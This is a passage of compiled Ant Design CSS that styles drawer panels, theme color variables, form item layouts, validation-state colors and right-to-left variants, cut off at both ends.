top: 0; } .ant-drawer-top.ant-drawer-open .ant-drawer-content-wrapper { box-shadow: 0 6px 16px -8px rgba(0, 0, 0, 0.08), 0 9px 28px 0 rgba(0, 0, 0, 0.05), 0 12px 48px 16px rgba(0, 0, 0, 0.03); } .ant-drawer-bottom { bottom: 0; } .ant-drawer-bottom .ant-drawer-content-wrapper { bottom: 0; } .ant-drawer-bottom.ant-drawer-open .ant-drawer-content-wrapper { box-shadow: 0 -6px 16px -8px rgba(0, 0, 0, 0.08), 0 -9px 28px 0 rgba(0, 0, 0, 0.05), 0 -12px 48px 16px rgba(0, 0, 0, 0.03); } .ant-drawer-bottom.ant-drawer-open.no-mask { bottom: 1px; transform: translateY(1px); } .ant-drawer.ant-drawer-open .ant-drawer-mask { height: 100%; opacity: 1; transition: none; -webkit-animation: antdDrawerFadeIn 0.3s cubic-bezier(0.23, 1, 0.32, 1); animation: antdDrawerFadeIn 0.3s cubic-bezier(0.23, 1, 0.32, 1); pointer-events: auto; } .ant-drawer-title { flex: 1; margin: 0; color: rgba(0, 0, 0, 0.85); font-weight: 500; font-size: 16px; line-height: 22px; } .ant-drawer-content { position: relative; z-index: 1; overflow: auto; background-color: #fff; background-clip: padding-box; border: 0; } .ant-drawer-close { display: inline-block; margin-right: 12px; color: rgba(0, 0, 0, 0.45); font-weight: 700; font-size: 16px; font-style: normal; line-height: 1; text-align: center; text-transform: none; text-decoration: none; background: transparent; border: 0; outline: 0; cursor: pointer; transition: color 0.3s; text-rendering: auto; } .ant-drawer-close:focus, .ant-drawer-close:hover { color: rgba(0, 0, 0, 0.75); text-decoration: none; } .ant-drawer-header { position: relative; display: flex; align-items: center; justify-content: space-between; padding: 16px 24px; color: rgba(0, 0, 0, 0.85); background: #fff; border-bottom: 1px solid #f0f0f0; border-radius: 2px 2px 0 0; } .ant-drawer-header-title { display: flex; flex: 1; align-items: center; justify-content: space-between; } .ant-drawer-header-close-only { padding-bottom: 0; border: none; } .ant-drawer-wrapper-body { display: flex; flex-flow: column nowrap; width: 100%; height: 100%; } .ant-drawer-body { flex-grow: 1; padding: 24px; overflow: auto; font-size: 14px; line-height: 1.5715; word-wrap: break-word; } .ant-drawer-footer { flex-shrink: 0; padding: 10px 16px; border-top: 1px solid #f0f0f0; } .ant-drawer-mask { position: absolute; top: 0; left: 0; width: 100%; height: 0; background-color: rgba(0, 0, 0, 0.45); opacity: 0; transition: opacity 0.3s linear, height 0s ease 0.3s; pointer-events: none; } .ant-drawer .ant-picker-clear { background: #fff; } @-webkit-keyframes antdDrawerFadeIn { 0% { opacity: 0; } 100% { opacity: 1; } } @keyframes antdDrawerFadeIn { 0% { opacity: 0; } 100% { opacity: 1; } } .ant-drawer-rtl { direction: rtl; } .ant-drawer-rtl .ant-drawer-close { margin-right: 0; margin-left: 12px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-form-item .ant-upload { background: transparent; } .ant-form-item .ant-upload.ant-upload-drag { background: #fafafa; } .ant-form-item input[type='radio'], .ant-form-item input[type='checkbox'] { width: 14px; height: 14px; } .ant-form-item .ant-radio-inline, .ant-form-item .ant-checkbox-inline { display: inline-block; margin-left: 8px; font-weight: normal; vertical-align: middle; cursor: pointer; } .ant-form-item .ant-radio-inline:first-child, .ant-form-item .ant-checkbox-inline:first-child { margin-left: 0; } .ant-form-item .ant-checkbox-vertical, .ant-form-item .ant-radio-vertical { display: block; } .ant-form-item .ant-checkbox-vertical + .ant-checkbox-vertical, .ant-form-item .ant-radio-vertical + .ant-radio-vertical { margin-left: 0; } .ant-form-item .ant-input-number + .ant-form-text { margin-left: 8px; } .ant-form-item .ant-input-number-handler-wrap { z-index: 2; } .ant-form-item .ant-select, .ant-form-item .ant-cascader-picker { width: 100%; } .ant-form-item .ant-picker-calendar-year-select, .ant-form-item .ant-picker-calendar-month-select, .ant-form-item .ant-input-group .ant-select, .ant-form-item .ant-input-group .ant-cascader-picker, .ant-form-item .ant-input-number-group .ant-select, .ant-form-item .ant-input-number-group .ant-cascader-picker { width: auto; } .ant-form-inline { display: flex; flex-wrap: wrap; } .ant-form-inline .ant-form-item { flex: none; flex-wrap: nowrap; margin-right: 16px; margin-bottom: 0; } .ant-form-inline .ant-form-item-with-help { margin-bottom: 24px; } .ant-form-inline .ant-form-item > .ant-form-item-label, .ant-form-inline .ant-form-item > .ant-form-item-control { display: inline-block; vertical-align: top; } .ant-form-inline .ant-form-item > .ant-form-item-label { flex: none; } .ant-form-inline .ant-form-item .ant-form-text { display: inline-block; } .ant-form-inline .ant-form-item .ant-form-item-has-feedback { display: inline-block; } .ant-form-horizontal .ant-form-item-label { flex-grow: 0; } .ant-form-horizontal .ant-form-item-control { flex: 1 1 0; } .ant-form-horizontal .ant-form-item-control:not(.ant-col) { min-width: 0; } .ant-form-vertical .ant-form-item { flex-direction: column; } .ant-form-vertical .ant-form-item-label > label { height: auto; } .ant-form-vertical .ant-form-item-label, .ant-col-24.ant-form-item-label, .ant-col-xl-24.ant-form-item-label { padding: 0 0 8px; line-height: 1.5715; white-space: initial; text-align: left; } .ant-form-vertical .ant-form-item-label > label, .ant-col-24.ant-form-item-label > label, .ant-col-xl-24.ant-form-item-label > label { margin: 0; } .ant-form-vertical .ant-form-item-label > label::after, .ant-col-24.ant-form-item-label > label::after, .ant-col-xl-24.ant-form-item-label > label::after { display: none; } .ant-form-rtl.ant-form-vertical .ant-form-item-label, .ant-form-rtl.ant-col-24.ant-form-item-label, .ant-form-rtl.ant-col-xl-24.ant-form-item-label { text-align: right; } @media (max-width: 575px) { .ant-form-item .ant-form-item-label { padding: 0 0 8px; line-height: 1.5715; white-space: initial; text-align: left; } .ant-form-item .ant-form-item-label > label { margin: 0; } .ant-form-item .ant-form-item-label > label::after { display: none; } .ant-form-rtl.ant-form-item .ant-form-item-label { text-align: right; } .ant-form .ant-form-item { flex-wrap: wrap; } .ant-form .ant-form-item .ant-form-item-label, .ant-form .ant-form-item .ant-form-item-control { flex: 0 0 100%; max-width: 100%; } .ant-col-xs-24.ant-form-item-label { padding: 0 0 8px; line-height: 1.5715; white-space: initial; text-align: left; } .ant-col-xs-24.ant-form-item-label > label { margin: 0; } .ant-col-xs-24.ant-form-item-label > label::after { display: none; } .ant-form-rtl.ant-col-xs-24.ant-form-item-label { text-align: right; } } @media (max-width: 767px) { .ant-col-sm-24.ant-form-item-label { padding: 0 0 8px; line-height: 1.5715; white-space: initial; text-align: left; } .ant-col-sm-24.ant-form-item-label > label { margin: 0; } .ant-col-sm-24.ant-form-item-label > label::after { display: none; } .ant-form-rtl.ant-col-sm-24.ant-form-item-label { text-align: right; } } @media (max-width: 991px) { .ant-col-md-24.ant-form-item-label { padding: 0 0 8px; line-height: 1.5715; white-space: initial; text-align: left; } .ant-col-md-24.ant-form-item-label > label { margin: 0; } .ant-col-md-24.ant-form-item-label > label::after { display: none; } .ant-form-rtl.ant-col-md-24.ant-form-item-label { text-align: right; } } @media (max-width: 1199px) { .ant-col-lg-24.ant-form-item-label { padding: 0 0 8px; line-height: 1.5715; white-space: initial; text-align: left; } .ant-col-lg-24.ant-form-item-label > label { margin: 0; } .ant-col-lg-24.ant-form-item-label > label::after { display: none; } .ant-form-rtl.ant-col-lg-24.ant-form-item-label { text-align: right; } } @media (max-width: 1599px) { .ant-col-xl-24.ant-form-item-label { padding: 0 0 8px; line-height: 1.5715; white-space: initial; text-align: left; } .ant-col-xl-24.ant-form-item-label > label { margin: 0; } .ant-col-xl-24.ant-form-item-label > label::after { display: none; } .ant-form-rtl.ant-col-xl-24.ant-form-item-label { text-align: right; } } .ant-form-item { /* Some non-status related component style is in `components.less` */ /* To support leave along ErrorList. We add additional className to handle explain style */ } .ant-form-item-explain-error { color: var(--ant-error-color); } .ant-form-item-explain-warning { color: var(--ant-warning-color); } .ant-form-item-has-feedback .ant-input { padding-right: 24px; } .ant-form-item-has-feedback .ant-input-affix-wrapper .ant-input-suffix { padding-right: 18px; } .ant-form-item-has-feedback .ant-input-search:not(.ant-input-search-enter-button) .ant-input-suffix { right: 28px; } .ant-form-item-has-feedback .ant-switch { margin: 2px 0 4px; } .ant-form-item-has-feedback > .ant-select .ant-select-arrow, .ant-form-item-has-feedback > .ant-select .ant-select-clear, .ant-form-item-has-feedback :not(.ant-input-group-addon) > .ant-select .ant-select-arrow, .ant-form-item-has-feedback :not(.ant-input-group-addon) > .ant-select .ant-select-clear, .ant-form-item-has-feedback :not(.ant-input-number-group-addon) > .ant-select .ant-select-arrow, .ant-form-item-has-feedback :not(.ant-input-number-group-addon) > .ant-select .ant-select-clear { right: 32px; } .ant-form-item-has-feedback > .ant-select .ant-select-selection-selected-value, .ant-form-item-has-feedback :not(.ant-input-group-addon) > .ant-select .ant-select-selection-selected-value, .ant-form-item-has-feedback :not(.ant-input-number-group-addon) > .ant-select .ant-select-selection-selected-value { padding-right: 42px; } .ant-form-item-has-feedback .ant-cascader-picker-arrow { margin-right: 19px; } .ant-form-item-has-feedback .ant-cascader-picker-clear { right: 32px; } .ant-form-item-has-feedback .ant-picker { padding-right: 29.2px; } .ant-form-item-has-feedback .ant-picker-large { padding-right: 29.2px; } .ant-form-item-has-feedback .ant-picker-small { padding-right: 25.2px; } .ant-form-item-has-feedback.ant-form-item-has-success .ant-form-item-children-icon, .ant-form-item-has-feedback.ant-form-item-has-warning .ant-form-item-children-icon, .ant-form-item-has-feedback.ant-form-item-has-error .ant-form-item-children-icon, .ant-form-item-has-feedback.ant-form-item-is-validating .ant-form-item-children-icon { position: absolute; top: 50%; right: 0; z-index: 1; width: 32px; height: 20px; margin-top: -10px; font-size: 14px; line-height: 20px; text-align: center; visibility: visible; -webkit-animation: zoomIn 0.3s cubic-bezier(0.12, 0.4, 0.29, 1.46); animation: zoomIn 0.3s cubic-bezier(0.12, 0.4, 0.29, 1.46); pointer-events: none; } .ant-form-item-has-success.ant-form-item-has-feedback .ant-form-item-children-icon { color: var(--ant-success-color); -webkit-animation-name: diffZoomIn1 !important; animation-name: diffZoomIn1 !important; } .ant-form-item-has-warning .ant-form-item-split { color: var(--ant-warning-color); } .ant-form-item-has-warning :not(.ant-input-disabled):not(.ant-input-borderless).ant-input, .ant-form-item-has-warning :not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper, .ant-form-item-has-warning :not(.ant-input-number-affix-wrapper-disabled):not(.ant-input-number-affix-wrapper-borderless).ant-input-number-affix-wrapper, .ant-form-item-has-warning :not(.ant-input-disabled):not(.ant-input-borderless).ant-input:hover, .ant-form-item-has-warning :not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper:hover, .ant-form-item-has-warning :not(.ant-input-number-affix-wrapper-disabled):not(.ant-input-number-affix-wrapper-borderless).ant-input-number-affix-wrapper:hover { background-color: #fff; border-color: var(--ant-warning-color); } .ant-form-item-has-warning :not(.ant-input-disabled):not(.ant-input-borderless).ant-input:focus, .ant-form-item-has-warning :not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper:focus, .ant-form-item-has-warning :not(.ant-input-number-affix-wrapper-disabled):not(.ant-input-number-affix-wrapper-borderless).ant-input-number-affix-wrapper:focus, .ant-form-item-has-warning :not(.ant-input-disabled):not(.ant-input-borderless).ant-input-focused, .ant-form-item-has-warning :not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper-focused, .ant-form-item-has-warning :not(.ant-input-number-affix-wrapper-disabled):not(.ant-input-number-affix-wrapper-borderless).ant-input-number-affix-wrapper-focused { border-color: var(--ant-warning-color-hover); box-shadow: 0 0 0 2px var(--ant-warning-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-warning .ant-calendar-picker-open .ant-calendar-picker-input { border-color: var(--ant-warning-color-hover); box-shadow: 0 0 0 2px var(--ant-warning-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-warning .ant-input-prefix, .ant-form-item-has-warning .ant-input-number-prefix { color: var(--ant-warning-color); } .ant-form-item-has-warning .ant-input-group-addon, .ant-form-item-has-warning .ant-input-number-group-addon { color: var(--ant-warning-color); border-color: var(--ant-warning-color); } .ant-form-item-has-warning .has-feedback { color: var(--ant-warning-color); } .ant-form-item-has-warning.ant-form-item-has-feedback .ant-form-item-children-icon { color: var(--ant-warning-color); -webkit-animation-name: diffZoomIn3 !important; animation-name: diffZoomIn3 !important; } .ant-form-item-has-warning .ant-select:not(.ant-select-disabled):not(.ant-select-customize-input) .ant-select-selector { background-color: #fff; border-color: var(--ant-warning-color) !important; } .ant-form-item-has-warning .ant-select:not(.ant-select-disabled):not(.ant-select-customize-input).ant-select-open .ant-select-selector, .ant-form-item-has-warning .ant-select:not(.ant-select-disabled):not(.ant-select-customize-input).ant-select-focused .ant-select-selector { border-color: var(--ant-warning-color-hover); box-shadow: 0 0 0 2px var(--ant-warning-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-warning .ant-input-number, .ant-form-item-has-warning .ant-picker { background-color: #fff; border-color: var(--ant-warning-color); } .ant-form-item-has-warning .ant-input-number-focused, .ant-form-item-has-warning .ant-picker-focused, .ant-form-item-has-warning .ant-input-number:focus, .ant-form-item-has-warning .ant-picker:focus { border-color: var(--ant-warning-color-hover); box-shadow: 0 0 0 2px var(--ant-warning-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-warning .ant-input-number:not([disabled]):hover, .ant-form-item-has-warning .ant-picker:not([disabled]):hover { background-color: #fff; border-color: var(--ant-warning-color); } .ant-form-item-has-warning .ant-cascader-picker:focus .ant-cascader-input { border-color: var(--ant-warning-color-hover); box-shadow: 0 0 0 2px var(--ant-warning-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-error .ant-form-item-split { color: var(--ant-error-color); } .ant-form-item-has-error :not(.ant-input-disabled):not(.ant-input-borderless).ant-input, .ant-form-item-has-error :not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper, .ant-form-item-has-error :not(.ant-input-number-affix-wrapper-disabled):not(.ant-input-number-affix-wrapper-borderless).ant-input-number-affix-wrapper, .ant-form-item-has-error :not(.ant-input-disabled):not(.ant-input-borderless).ant-input:hover, .ant-form-item-has-error :not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper:hover, .ant-form-item-has-error :not(.ant-input-number-affix-wrapper-disabled):not(.ant-input-number-affix-wrapper-borderless).ant-input-number-affix-wrapper:hover { background-color: #fff; border-color: var(--ant-error-color); } .ant-form-item-has-error :not(.ant-input-disabled):not(.ant-input-borderless).ant-input:focus, .ant-form-item-has-error :not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper:focus, .ant-form-item-has-error :not(.ant-input-number-affix-wrapper-disabled):not(.ant-input-number-affix-wrapper-borderless).ant-input-number-affix-wrapper:focus, .ant-form-item-has-error :not(.ant-input-disabled):not(.ant-input-borderless).ant-input-focused, .ant-form-item-has-error :not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper-focused, .ant-form-item-has-error :not(.ant-input-number-affix-wrapper-disabled):not(.ant-input-number-affix-wrapper-borderless).ant-input-number-affix-wrapper-focused { border-color: var(--ant-error-color-hover); box-shadow: 0 0 0 2px var(--ant-error-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-error .ant-calendar-picker-open .ant-calendar-picker-input { border-color: var(--ant-error-color-hover); box-shadow: 0 0 0 2px var(--ant-error-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-error .ant-input-prefix, .ant-form-item-has-error .ant-input-number-prefix { color: var(--ant-error-color); } .ant-form-item-has-error .ant-input-group-addon, .ant-form-item-has-error .ant-input-number-group-addon { color: var(--ant-error-color); border-color: var(--ant-error-color); } .ant-form-item-has-error .has-feedback { color: var(--ant-error-color); } .ant-form-item-has-error.ant-form-item-has-feedback .ant-form-item-children-icon { color: var(--ant-error-color); -webkit-animation-name: diffZoomIn2 !important; animation-name: diffZoomIn2 !important; } .ant-form-item-has-error .ant-select:not(.ant-select-disabled):not(.ant-select-customize-input) .ant-select-selector { background-color: #fff; border-color: var(--ant-error-color) !important; } .ant-form-item-has-error .ant-select:not(.ant-select-disabled):not(.ant-select-customize-input).ant-select-open .ant-select-selector, .ant-form-item-has-error .ant-select:not(.ant-select-disabled):not(.ant-select-customize-input).ant-select-focused .ant-select-selector { border-color: var(--ant-error-color-hover); box-shadow: 0 0 0 2px var(--ant-error-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-error .ant-input-group-addon .ant-select.ant-select-single:not(.ant-select-customize-input) .ant-select-selector, .ant-form-item-has-error .ant-input-number-group-addon .ant-select.ant-select-single:not(.ant-select-customize-input) .ant-select-selector { background-color: inherit; border: 0; box-shadow: none; } .ant-form-item-has-error .ant-select.ant-select-auto-complete .ant-input:focus { border-color: var(--ant-error-color); } .ant-form-item-has-error .ant-input-number, .ant-form-item-has-error .ant-picker { background-color: #fff; border-color: var(--ant-error-color); } .ant-form-item-has-error .ant-input-number-focused, .ant-form-item-has-error .ant-picker-focused, .ant-form-item-has-error .ant-input-number:focus, .ant-form-item-has-error .ant-picker:focus { border-color: var(--ant-error-color-hover); box-shadow: 0 0 0 2px var(--ant-error-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-error .ant-input-number:not([disabled]):hover, .ant-form-item-has-error .ant-picker:not([disabled]):hover { background-color: #fff; border-color: var(--ant-error-color); } .ant-form-item-has-error .ant-mention-wrapper .ant-mention-editor, .ant-form-item-has-error .ant-mention-wrapper .ant-mention-editor:not([disabled]):hover { background-color: #fff; border-color: var(--ant-error-color); } .ant-form-item-has-error .ant-mention-wrapper.ant-mention-active:not([disabled]) .ant-mention-editor, .ant-form-item-has-error .ant-mention-wrapper .ant-mention-editor:not([disabled]):focus { border-color: var(--ant-error-color-hover); box-shadow: 0 0 0 2px var(--ant-error-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-error .ant-cascader-picker:hover .ant-cascader-picker-label:hover + .ant-cascader-input.ant-input { border-color: var(--ant-error-color); } .ant-form-item-has-error .ant-cascader-picker:focus .ant-cascader-input { background-color: #fff; border-color: var(--ant-error-color-hover); box-shadow: 0 0 0 2px var(--ant-error-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-error .ant-transfer-list { border-color: var(--ant-error-color); } .ant-form-item-has-error .ant-transfer-list-search:not([disabled]) { border-color: #d9d9d9; } .ant-form-item-has-error .ant-transfer-list-search:not([disabled]):hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-form-item-has-error .ant-transfer-list-search:not([disabled]):focus { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-has-error .ant-radio-button-wrapper { border-color: var(--ant-error-color) !important; } .ant-form-item-has-error .ant-radio-button-wrapper:not(:first-child)::before { background-color: var(--ant-error-color); } .ant-form-item-has-error .ant-mentions { border-color: var(--ant-error-color) !important; } .ant-form-item-has-error .ant-mentions-focused, .ant-form-item-has-error .ant-mentions:focus { border-color: var(--ant-error-color-hover); box-shadow: 0 0 0 2px var(--ant-error-color-outline); border-right-width: 1px !important; outline: 0; } .ant-form-item-is-validating.ant-form-item-has-feedback .ant-form-item-children-icon { display: inline-block; color: var(--ant-primary-color); } .ant-form { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; } .ant-form legend { display: block; width: 100%; margin-bottom: 20px; padding: 0; color: rgba(0, 0, 0, 0.45); font-size: 16px; line-height: inherit; border: 0; border-bottom: 1px solid #d9d9d9; } .ant-form label { font-size: 14px; } .ant-form input[type='search'] { box-sizing: border-box; } .ant-form input[type='radio'], .ant-form input[type='checkbox'] { line-height: normal; } .ant-form input[type='file'] { display: block; } .ant-form input[type='range'] { display: block; width: 100%; } .ant-form select[multiple], .ant-form select[size] { height: auto; } .ant-form input[type='file']:focus, .ant-form input[type='radio']:focus, .ant-form input[type='checkbox']:focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } .ant-form output { display: block; padding-top: 15px; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 1.5715; } .ant-form .ant-form-text { display: inline-block; padding-right: 8px; } .ant-form-small .ant-form-item-label > label { height: 24px; } .ant-form-small .ant-form-item-control-input { min-height: 24px; } .ant-form-large .ant-form-item-label > label { height: 40px; } .ant-form-large .ant-form-item-control-input { min-height: 40px; } .ant-form-item { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; margin-bottom: 24px; vertical-align: top; transition: margin-bottom 0.3s 0.017s linear; } .ant-form-item-with-help { margin-bottom: 0; transition: none; } .ant-form-item-hidden, .ant-form-item-hidden.ant-row { display: none; } .ant-form-item-label { display: inline-block; flex-grow: 0; overflow: hidden; white-space: nowrap; text-align: right; vertical-align: middle; } .ant-form-item-label-left { text-align: left; } .ant-form-item-label-wrap { overflow: unset; line-height: 1.3215em; white-space: unset; } .ant-form-item-label > label { position: relative; display: inline-flex; align-items: center; max-width: 100%; height: 32px; color: rgba(0, 0, 0, 0.85); font-size: 14px; } .ant-form-item-label > label > .anticon { font-size: 14px; vertical-align: top; } .ant-form-item-label > label.ant-form-item-required:not(.ant-form-item-required-mark-optional)::before { display: inline-block; margin-right: 4px; color: #ff4d4f; font-size: 14px; font-family: SimSun, sans-serif; line-height: 1; content: '*'; } .ant-form-hide-required-mark .ant-form-item-label > label.ant-form-item-required:not(.ant-form-item-required-mark-optional)::before { display: none; } .ant-form-item-label > label .ant-form-item-optional { display: inline-block; margin-left: 4px; color: rgba(0, 0, 0, 0.45); } .ant-form-hide-required-mark .ant-form-item-label > label .ant-form-item-optional { display: none; } .ant-form-item-label > label .ant-form-item-tooltip { color: rgba(0, 0, 0, 0.45); cursor: help; -ms-writing-mode: lr-tb; writing-mode: horizontal-tb; -webkit-margin-start: 4px; margin-inline-start: 4px; } .ant-form-item-label > label::after { content: ':'; position: relative; top: -0.5px; margin: 0 8px 0 2px; } .ant-form-item-label > label.ant-form-item-no-colon::after { content: ' '; } .ant-form-item-control { display: flex; flex-direction: column; flex-grow: 1; } .ant-form-item-control:first-child:not([class^='ant-col-']):not([class*=' ant-col-']) { width: 100%; } .ant-form-item-control-input { position: relative; display: flex; align-items: center; min-height: 32px; } .ant-form-item-control-input-content { flex: auto; max-width: 100%; } .ant-form-item-explain, .ant-form-item-extra { clear: both; color: rgba(0, 0, 0, 0.45); font-size: 14px; line-height: 1.5715; transition: color 0.3s cubic-bezier(0.215, 0.61, 0.355, 1); } .ant-form-item-explain-connected { height: 0; min-height: 0; opacity: 0; } .ant-form-item-extra { min-height: 24px; } .ant-form-item .ant-input-textarea-show-count::after { margin-bottom: -22px; } .ant-form-item-with-help .ant-form-item-explain { height: auto; min-height: 24px; opacity: 1; } .ant-show-help { transition: height 0.3s linear, min-height 0.3s linear, margin-bottom 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), opacity 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-show-help-leave { min-height: 24px; } .ant-show-help-leave-active { min-height: 0; } .ant-show-help-item { overflow: hidden; transition: height 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), opacity 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), transform 0.3s cubic-bezier(0.645, 0.045, 0.355, 1) !important; } .ant-show-help-item-appear, .ant-show-help-item-enter { transform: translateY(-5px); opacity: 0; } .ant-show-help-item-appear-active, .ant-show-help-item-enter-active { transform: translateY(0); opacity: 1; } .ant-show-help-item-leave-active { transform: translateY(-5px); } @-webkit-keyframes diffZoomIn1 { 0% { transform: scale(0); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } @keyframes diffZoomIn1 { 0% { transform: scale(0); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } @-webkit-keyframes diffZoomIn2 { 0% { transform: scale(0); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } @keyframes diffZoomIn2 { 0% { transform: scale(0); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } @-webkit-keyframes diffZoomIn3 { 0% { transform: scale(0); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } @keyframes diffZoomIn3 { 0% { transform: scale(0); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } .ant-form-rtl { direction: rtl; } .ant-form-rtl .ant-form-item-label { text-align: left; } .ant-form-rtl .ant-form-item-label > label.ant-form-item-required::before { margin-right: 0; margin-left: 4px; } .ant-form-rtl .ant-form-item-label > label::after { margin: 0 2px 0 8px; } .ant-form-rtl .ant-form-item-label > label .ant-form-item-optional { margin-right: 4px; margin-left: 0; } .ant-col-rtl .ant-form-item-control:first-child { width: 100%; } .ant-form-rtl .ant-form-item-has-feedback .ant-input { padding-right: 11px; padding-left: 24px; } .ant-form-rtl .ant-form-item-has-feedback .ant-input-affix-wrapper .ant-input-suffix { padding-right: 11px; padding-left: 18px; } .ant-form-rtl .ant-form-item-has-feedback .ant-input-affix-wrapper .ant-input { padding: 0; } .ant-form-rtl .ant-form-item-has-feedback .ant-input-number-affix-wrapper .ant-input-number { padding: 0; } .ant-form-rtl .ant-form-item-has-feedback .ant-input-search:not(.ant-input-search-enter-button) .ant-input-suffix { right: auto; left: 28px; } .ant-form-rtl .ant-form-item-has-feedback .ant-input-number { padding-left: 18px; } .ant-form-rtl .ant-form-item-has-feedback > .ant-select .ant-select-arrow, .ant-form-rtl .ant-form-item-has-feedback > .ant-select .ant-select-clear, .ant-form-rtl .ant-form-item-has-feedback :not(.ant-input-group-addon) > .ant-select .ant-select-arrow, .ant-form-rtl .ant-form-item-has-feedback :not(.ant-input-group-addon) > .ant-select .ant-select-clear, .ant-form-rtl .ant-form-item-has-feedback :not(.ant-input-number-group-addon) > .ant-select .ant-select-arrow, .ant-form-rtl .ant-form-item-has-feedback :not(.ant-input-number-group-addon) > .ant-select .ant-select-clear { right: auto; left: 32px; } .ant-form-rtl .ant-form-item-has-feedback > .ant-select .ant-select-selection-selected-value, .ant-form-rtl .ant-form-item-has-feedback :not(.ant-input-group-addon) > .ant-select .ant-select-selection-selected-value, .ant-form-rtl .ant-form-item-has-feedback :not(.ant-input-number-group-addon) > .ant-select .ant-select-selection-selected-value { padding-right: 0; padding-left: 42px; } .ant-form-rtl .ant-form-item-has-feedback .ant-cascader-picker-arrow { margin-right: 0; margin-left: 19px; } .ant-form-rtl .ant-form-item-has-feedback .ant-cascader-picker-clear { right: auto; left: 32px; } .ant-form-rtl .ant-form-item-has-feedback .ant-picker { padding-right: 11px; padding-left: 29.2px; } .ant-form-rtl .ant-form-item-has-feedback .ant-picker-large { padding-right: 11px; padding-left: 29.2px; } .ant-form-rtl .ant-form-item-has-feedback .ant-picker-small { padding-right: 7px; padding-left: 25.2px; } .ant-form-rtl .ant-form-item-has-feedback.ant-form-item-has-success .ant-form-item-children-icon, .ant-form-rtl .ant-form-item-has-feedback.ant-form-item-has-warning .ant-form-item-children-icon, .ant-form-rtl .ant-form-item-has-feedback.ant-form-item-has-error .ant-form-item-children-icon, .ant-form-rtl .ant-form-item-has-feedback.ant-form-item-is-validating .ant-form-item-children-icon { right: auto; left: 0; } .ant-form-rtl.ant-form-inline .ant-form-item { margin-right: 0; margin-left: 16px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable 